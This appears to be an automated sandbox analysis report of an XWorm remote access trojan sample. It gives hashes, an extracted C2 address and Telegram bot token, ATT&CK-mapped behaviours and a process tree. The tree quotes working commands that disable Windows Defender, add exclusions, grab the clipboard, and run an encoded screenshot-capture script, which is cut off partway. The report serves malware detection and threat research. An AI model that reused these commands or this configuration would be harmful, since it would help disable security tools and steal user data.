xworm | 11ba97f6d0c8491d14372948dbac71c5a7b24d4f492b9ec1b5afde5c3d5473b7

Analysis

max time kernel
139s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
21-10-2024 01:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

autoupts.exe
Size

7.5MB
MD5

08d3f972602755f9941054edc2b97d96
SHA1

7a0b77b41e241d4c70d9e7a74bd7da10bdddeb58
SHA256

9efb448ed0cc9519bd5b954444261f5af7d1d148bcc4059a9b1cb82382c80206
SHA512

dbf2a57f4e3376093a84c0f05dab3b867ceb61a5b0ef83283f3ccba499219c15e89754afd1b50f47b5377db47fb168f3d9ac74afbec5987386828d4e37624930
SSDEEP

196608:Iw8PENLjv+bhqNVoB0SEsucQZ41JBbIr11ms:t8PmL+9qz80SJHQK1JG1Ys

Score

10^/10

xworm collection credential_access defense_evasion discovery execution persistence privilege_escalation rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

Version

5.0

154.216.19.12:7000

Mutex

pmb6Tw0klnC0ZY4L

Attributes

Install_directory
%AppData%
install_file
notepad.exe
telegram
https://api.telegram.org/bot7991608689:AAFUN71TMgyF_fzKFz6tyyBijaijI3s82tk

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023ca2-135.dat	family_xworm
behavioral2/memory/2712-137-0x00000000001F0000-0x0000000000200000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4808	powershell.exe
4416	powershell.exe
3720	powershell.exe
5212	powershell.exe
4168	powershell.exe
1844	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	bound.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1760	powershell.exe
2156	cmd.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk	bound.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk	bound.exe

Executes dropped EXE 4 IoCs

pid	Process
2712	bound.exe
5592	rar.exe
5792	kbakst.exe
5900	kbakst.exe

Loads dropped DLL 33 IoCs

pid	Process
4452	autoupts.exe
4452	autoupts.exe
4452	autoupts.exe
4452	autoupts.exe
4452	autoupts.exe
4452	autoupts.exe
4452	autoupts.exe
4452	autoupts.exe
4452	autoupts.exe
4452	autoupts.exe
4452	autoupts.exe
4452	autoupts.exe
4452	autoupts.exe
4452	autoupts.exe
4452	autoupts.exe
4452	autoupts.exe
4452	autoupts.exe
5900	kbakst.exe
5900	kbakst.exe
5900	kbakst.exe
5900	kbakst.exe
5900	kbakst.exe
5900	kbakst.exe
5900	kbakst.exe
5900	kbakst.exe
5900	kbakst.exe
5900	kbakst.exe
5900	kbakst.exe
5900	kbakst.exe
5900	kbakst.exe
5900	kbakst.exe
5900	kbakst.exe
5900	kbakst.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
30	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2736	tasklist.exe
524	tasklist.exe
3564	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c99-22.dat	upx
behavioral2/memory/4452-26-0x00007FFC4B6A0000-0x00007FFC4BC8E000-memory.dmp	upx
behavioral2/files/0x0007000000023c8b-29.dat	upx
behavioral2/memory/4452-31-0x00007FFC5F950000-0x00007FFC5F974000-memory.dmp	upx
behavioral2/files/0x0007000000023c97-32.dat	upx
behavioral2/memory/4452-50-0x00007FFC64350000-0x00007FFC6435F000-memory.dmp	upx
behavioral2/files/0x0007000000023c92-49.dat	upx
behavioral2/files/0x0007000000023c91-48.dat	upx
behavioral2/files/0x0007000000023c90-47.dat	upx
behavioral2/files/0x0007000000023c8f-46.dat	upx
behavioral2/files/0x0007000000023c8e-45.dat	upx
behavioral2/files/0x0007000000023c8d-44.dat	upx
behavioral2/files/0x0007000000023c8c-43.dat	upx
behavioral2/files/0x0007000000023c8a-42.dat	upx
behavioral2/files/0x0007000000023c9e-41.dat	upx
behavioral2/files/0x0007000000023c9d-40.dat	upx
behavioral2/files/0x0007000000023c9c-39.dat	upx
behavioral2/files/0x0007000000023c98-36.dat	upx
behavioral2/files/0x0007000000023c96-35.dat	upx
behavioral2/memory/4452-56-0x00007FFC5A710000-0x00007FFC5A73D000-memory.dmp	upx
behavioral2/memory/4452-58-0x00007FFC5AB90000-0x00007FFC5ABA9000-memory.dmp	upx
behavioral2/memory/4452-60-0x00007FFC5A6E0000-0x00007FFC5A703000-memory.dmp	upx
behavioral2/memory/4452-62-0x00007FFC4B0B0000-0x00007FFC4B226000-memory.dmp	upx
behavioral2/memory/4452-66-0x00007FFC5E620000-0x00007FFC5E62D000-memory.dmp	upx
behavioral2/memory/4452-65-0x00007FFC5A6C0000-0x00007FFC5A6D9000-memory.dmp	upx
behavioral2/memory/4452-72-0x00007FFC4AAB0000-0x00007FFC4AFD2000-memory.dmp	upx
behavioral2/memory/4452-71-0x00007FFC5A680000-0x00007FFC5A6B3000-memory.dmp	upx
behavioral2/memory/4452-78-0x00007FFC588F0000-0x00007FFC58904000-memory.dmp	upx
behavioral2/memory/4452-77-0x00007FFC5F950000-0x00007FFC5F974000-memory.dmp	upx
behavioral2/memory/4452-75-0x00007FFC4AFE0000-0x00007FFC4B0AD000-memory.dmp	upx
behavioral2/memory/4452-74-0x00007FFC4B6A0000-0x00007FFC4BC8E000-memory.dmp	upx
behavioral2/memory/4452-80-0x00007FFC5A3A0000-0x00007FFC5A3AD000-memory.dmp	upx
behavioral2/memory/4452-86-0x00007FFC4A230000-0x00007FFC4A34C000-memory.dmp	upx
behavioral2/memory/4452-85-0x00007FFC5A710000-0x00007FFC5A73D000-memory.dmp	upx
behavioral2/memory/4452-190-0x00007FFC5A6E0000-0x00007FFC5A703000-memory.dmp	upx
behavioral2/memory/4452-207-0x00007FFC4B0B0000-0x00007FFC4B226000-memory.dmp	upx
behavioral2/memory/4452-279-0x00007FFC5A6C0000-0x00007FFC5A6D9000-memory.dmp	upx
behavioral2/memory/4452-309-0x00007FFC5A680000-0x00007FFC5A6B3000-memory.dmp	upx
behavioral2/memory/4452-310-0x00007FFC4AAB0000-0x00007FFC4AFD2000-memory.dmp	upx
behavioral2/memory/4452-322-0x00007FFC4AFE0000-0x00007FFC4B0AD000-memory.dmp	upx
behavioral2/memory/4452-333-0x00007FFC4B6A0000-0x00007FFC4BC8E000-memory.dmp	upx
behavioral2/memory/4452-339-0x00007FFC4B0B0000-0x00007FFC4B226000-memory.dmp	upx
behavioral2/memory/4452-347-0x00007FFC4A230000-0x00007FFC4A34C000-memory.dmp	upx
behavioral2/memory/4452-334-0x00007FFC5F950000-0x00007FFC5F974000-memory.dmp	upx
behavioral2/memory/4452-363-0x00007FFC4B6A0000-0x00007FFC4BC8E000-memory.dmp	upx
behavioral2/memory/5900-426-0x00007FFC415C0000-0x00007FFC41BAE000-memory.dmp	upx
behavioral2/memory/5900-427-0x00007FFC5A490000-0x00007FFC5A4B4000-memory.dmp	upx
behavioral2/memory/5900-428-0x00007FFC5AE30000-0x00007FFC5AE3F000-memory.dmp	upx
behavioral2/memory/5900-433-0x00007FFC5A460000-0x00007FFC5A48D000-memory.dmp	upx
behavioral2/memory/5900-434-0x00007FFC5A3B0000-0x00007FFC5A3C9000-memory.dmp	upx
behavioral2/memory/5900-435-0x00007FFC56040000-0x00007FFC56063000-memory.dmp	upx
behavioral2/memory/5900-436-0x00007FFC4B520000-0x00007FFC4B696000-memory.dmp	upx
behavioral2/memory/5900-437-0x00007FFC4BCA0000-0x00007FFC4BCB9000-memory.dmp	upx
behavioral2/memory/5900-438-0x00007FFC5AE20000-0x00007FFC5AE2D000-memory.dmp	upx
behavioral2/memory/5900-439-0x00007FFC4B4E0000-0x00007FFC4B513000-memory.dmp	upx
behavioral2/memory/5900-441-0x00007FFC4A9E0000-0x00007FFC4AAAD000-memory.dmp	upx
behavioral2/memory/5900-440-0x00007FFC415C0000-0x00007FFC41BAE000-memory.dmp	upx
behavioral2/memory/5900-444-0x00007FFC5A490000-0x00007FFC5A4B4000-memory.dmp	upx
behavioral2/memory/5900-442-0x00007FFC41090000-0x00007FFC415B2000-memory.dmp	upx
behavioral2/memory/5900-445-0x00007FFC4A9C0000-0x00007FFC4A9D4000-memory.dmp	upx
behavioral2/memory/5900-447-0x00007FFC586C0000-0x00007FFC586CD000-memory.dmp	upx
behavioral2/memory/5900-446-0x00007FFC5A460000-0x00007FFC5A48D000-memory.dmp	upx
behavioral2/memory/5900-452-0x00007FFC5A3B0000-0x00007FFC5A3C9000-memory.dmp	upx
behavioral2/memory/5900-466-0x00007FFC4B4E0000-0x00007FFC4B513000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1048	cmd.exe
2268	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5056	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
376	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
4416	powershell.exe
4416	powershell.exe
4808	powershell.exe
4808	powershell.exe
3720	powershell.exe
3720	powershell.exe
1844	powershell.exe
1844	powershell.exe
216	powershell.exe
216	powershell.exe
1760	powershell.exe
1760	powershell.exe
4416	powershell.exe
4416	powershell.exe
4808	powershell.exe
4808	powershell.exe
3720	powershell.exe
3720	powershell.exe
1844	powershell.exe
1844	powershell.exe
216	powershell.exe
1760	powershell.exe
5212	powershell.exe
5212	powershell.exe
5212	powershell.exe
5372	powershell.exe
5372	powershell.exe
5372	powershell.exe
2712	bound.exe
2712	bound.exe
4168	powershell.exe
4168	powershell.exe
4168	powershell.exe
2480	powershell.exe
2480	powershell.exe
2480	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4416	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeDebugPrivilege	2712	bound.exe
Token: SeDebugPrivilege	3720	powershell.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	3564	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2620	WMIC.exe
Token: SeSecurityPrivilege	2620	WMIC.exe
Token: SeTakeOwnershipPrivilege	2620	WMIC.exe
Token: SeLoadDriverPrivilege	2620	WMIC.exe
Token: SeSystemProfilePrivilege	2620	WMIC.exe
Token: SeSystemtimePrivilege	2620	WMIC.exe
Token: SeProfSingleProcessPrivilege	2620	WMIC.exe
Token: SeIncBasePriorityPrivilege	2620	WMIC.exe
Token: SeCreatePagefilePrivilege	2620	WMIC.exe
Token: SeBackupPrivilege	2620	WMIC.exe
Token: SeRestorePrivilege	2620	WMIC.exe
Token: SeShutdownPrivilege	2620	WMIC.exe
Token: SeDebugPrivilege	2620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2620	WMIC.exe
Token: SeRemoteShutdownPrivilege	2620	WMIC.exe
Token: SeUndockPrivilege	2620	WMIC.exe
Token: SeManageVolumePrivilege	2620	WMIC.exe
Token: 33	2620	WMIC.exe
Token: 34	2620	WMIC.exe
Token: 35	2620	WMIC.exe
Token: 36	2620	WMIC.exe
Token: SeDebugPrivilege	2736	tasklist.exe
Token: SeDebugPrivilege	524	tasklist.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeDebugPrivilege	1760	powershell.exe
Token: SeIncreaseQuotaPrivilege	2620	WMIC.exe
Token: SeSecurityPrivilege	2620	WMIC.exe
Token: SeTakeOwnershipPrivilege	2620	WMIC.exe
Token: SeLoadDriverPrivilege	2620	WMIC.exe
Token: SeSystemProfilePrivilege	2620	WMIC.exe
Token: SeSystemtimePrivilege	2620	WMIC.exe
Token: SeProfSingleProcessPrivilege	2620	WMIC.exe
Token: SeIncBasePriorityPrivilege	2620	WMIC.exe
Token: SeCreatePagefilePrivilege	2620	WMIC.exe
Token: SeBackupPrivilege	2620	WMIC.exe
Token: SeRestorePrivilege	2620	WMIC.exe
Token: SeShutdownPrivilege	2620	WMIC.exe
Token: SeDebugPrivilege	2620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2620	WMIC.exe
Token: SeRemoteShutdownPrivilege	2620	WMIC.exe
Token: SeUndockPrivilege	2620	WMIC.exe
Token: SeManageVolumePrivilege	2620	WMIC.exe
Token: 33	2620	WMIC.exe
Token: 34	2620	WMIC.exe
Token: 35	2620	WMIC.exe
Token: 36	2620	WMIC.exe
Token: SeDebugPrivilege	5212	powershell.exe
Token: SeDebugPrivilege	5372	powershell.exe
Token: SeIncreaseQuotaPrivilege	4252	WMIC.exe
Token: SeSecurityPrivilege	4252	WMIC.exe
Token: SeTakeOwnershipPrivilege	4252	WMIC.exe
Token: SeLoadDriverPrivilege	4252	WMIC.exe
Token: SeSystemProfilePrivilege	4252	WMIC.exe
Token: SeSystemtimePrivilege	4252	WMIC.exe
Token: SeProfSingleProcessPrivilege	4252	WMIC.exe
Token: SeIncBasePriorityPrivilege	4252	WMIC.exe
Token: SeCreatePagefilePrivilege	4252	WMIC.exe
Token: SeBackupPrivilege	4252	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2712	bound.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1052 wrote to memory of 4452	1052	autoupts.exe	84
PID 1052 wrote to memory of 4452	1052	autoupts.exe	84
PID 4452 wrote to memory of 1612	4452	autoupts.exe	88
PID 4452 wrote to memory of 1612	4452	autoupts.exe	88
PID 4452 wrote to memory of 1772	4452	autoupts.exe	89
PID 4452 wrote to memory of 1772	4452	autoupts.exe	89
PID 4452 wrote to memory of 3668	4452	autoupts.exe	90
PID 4452 wrote to memory of 3668	4452	autoupts.exe	90
PID 4452 wrote to memory of 4472	4452	autoupts.exe	92
PID 4452 wrote to memory of 4472	4452	autoupts.exe	92
PID 4452 wrote to memory of 2388	4452	autoupts.exe	93
PID 4452 wrote to memory of 2388	4452	autoupts.exe	93
PID 4452 wrote to memory of 2692	4452	autoupts.exe	95
PID 4452 wrote to memory of 2692	4452	autoupts.exe	95
PID 1772 wrote to memory of 1844	1772	cmd.exe	100
PID 1772 wrote to memory of 1844	1772	cmd.exe	100
PID 1612 wrote to memory of 4808	1612	cmd.exe	101
PID 1612 wrote to memory of 4808	1612	cmd.exe	101
PID 3668 wrote to memory of 4416	3668	cmd.exe	102
PID 3668 wrote to memory of 4416	3668	cmd.exe	102
PID 2692 wrote to memory of 3720	2692	cmd.exe	104
PID 2692 wrote to memory of 3720	2692	cmd.exe	104
PID 2388 wrote to memory of 388	2388	cmd.exe	105
PID 2388 wrote to memory of 388	2388	cmd.exe	105
PID 4452 wrote to memory of 3816	4452	autoupts.exe	103
PID 4452 wrote to memory of 3816	4452	autoupts.exe	103
PID 4452 wrote to memory of 920	4452	autoupts.exe	106
PID 4452 wrote to memory of 920	4452	autoupts.exe	106
PID 4452 wrote to memory of 3484	4452	autoupts.exe	109
PID 4452 wrote to memory of 3484	4452	autoupts.exe	109
PID 4452 wrote to memory of 2480	4452	autoupts.exe	112
PID 4452 wrote to memory of 2480	4452	autoupts.exe	112
PID 4452 wrote to memory of 2156	4452	autoupts.exe	110
PID 4452 wrote to memory of 2156	4452	autoupts.exe	110
PID 4452 wrote to memory of 4332	4452	autoupts.exe	111
PID 4452 wrote to memory of 4332	4452	autoupts.exe	111
PID 4452 wrote to memory of 4944	4452	autoupts.exe	113
PID 4452 wrote to memory of 4944	4452	autoupts.exe	113
PID 4452 wrote to memory of 756	4452	autoupts.exe	114
PID 4452 wrote to memory of 756	4452	autoupts.exe	114
PID 4452 wrote to memory of 1048	4452	autoupts.exe	115
PID 4452 wrote to memory of 1048	4452	autoupts.exe	115
PID 4472 wrote to memory of 2712	4472	cmd.exe	123
PID 4472 wrote to memory of 2712	4472	cmd.exe	123
PID 3816 wrote to memory of 3564	3816	cmd.exe	124
PID 3816 wrote to memory of 3564	3816	cmd.exe	124
PID 3484 wrote to memory of 2620	3484	cmd.exe	125
PID 3484 wrote to memory of 2620	3484	cmd.exe	125
PID 920 wrote to memory of 2736	920	cmd.exe	126
PID 920 wrote to memory of 2736	920	cmd.exe	126
PID 4332 wrote to memory of 524	4332	cmd.exe	127
PID 4332 wrote to memory of 524	4332	cmd.exe	127
PID 756 wrote to memory of 4740	756	cmd.exe	153
PID 756 wrote to memory of 4740	756	cmd.exe	153
PID 2480 wrote to memory of 216	2480	cmd.exe	129
PID 2480 wrote to memory of 216	2480	cmd.exe	129
PID 2156 wrote to memory of 1760	2156	cmd.exe	130
PID 2156 wrote to memory of 1760	2156	cmd.exe	130
PID 1048 wrote to memory of 2268	1048	cmd.exe	131
PID 1048 wrote to memory of 2268	1048	cmd.exe	131
PID 4944 wrote to memory of 376	4944	cmd.exe	132
PID 4944 wrote to memory of 376	4944	cmd.exe	132
PID 4452 wrote to memory of 5148	4452	autoupts.exe	158
PID 4452 wrote to memory of 5148	4452	autoupts.exe	158

C:\Users\Admin\AppData\Local\Temp\autoupts.exe
"C:\Users\Admin\AppData\Local\Temp\autoupts.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1052
- C:\Users\Admin\AppData\Local\Temp\autoupts.exe
  "C:\Users\Admin\AppData\Local\Temp\autoupts.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\autoupts.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1612
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\autoupts.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1772
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4472
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:2712
    - - C:\Users\Admin\AppData\Local\Temp\kbakst.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kbakst.exe"
        5⤵
        Executes dropped EXE
        
        PID:5792
      - C:\Users\Admin\AppData\Local\Temp\kbakst.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kbakst.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Window recent update failed. Hang on it will retry in few minutes', 0, 'Error', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2388
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Window recent update failed. Hang on it will retry in few minutes', 0, 'Error', 32+16);close()"
      4⤵
      PID:388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3816
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:920
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3484
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4332
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCA